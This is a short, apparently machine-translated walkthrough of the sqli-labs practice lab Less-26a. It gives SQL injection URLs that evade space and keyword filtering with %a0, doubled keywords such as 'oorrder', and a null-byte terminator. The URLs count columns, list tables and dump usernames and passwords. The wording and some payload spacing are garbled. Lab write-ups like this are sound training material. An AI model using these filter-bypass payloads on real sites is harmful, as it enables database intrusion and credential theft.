This is similar to LESS26, the space or with%a0 instead, 26 after this is simple
;%0 0 can take the place of comments, try
ORDER BY 3
http://192.168.136.128/sqli-labs-master/Less-26a/?id=1 ')%a0oorrder%a0by%a03;%0 0
ORDER BY 4
Http://192.168.136.128/sqli-labs-master/Less-26a/?id=1')%a0oorrder%a0by%a04;%0 0
Although the error is not shown, we still know the number of fields is 3
http://192.168.136.128/sqli-labs-master/Less-26a/?id=0 ')%a0union%a0select%a01,2,table_name%a0from% A0infoorrmation_schema.tables%a0where%a0table_schema= ' security '%a0limit%a00,1;%0 0
http://192.168.136.128/sqli-labs-master/Less-26a/?id=0 ')%a0union%a0select%a01,username,passwoorrd%a0from% a0users%a0limit%a02,1;%0 0
"Sqli-labs" less26a get-blind based-all you SPACES and COMMENTS belong to Us-string-single quotes-parenthesis (GET type based on blind Single-quote parenthesis injection with whitespace and comments removed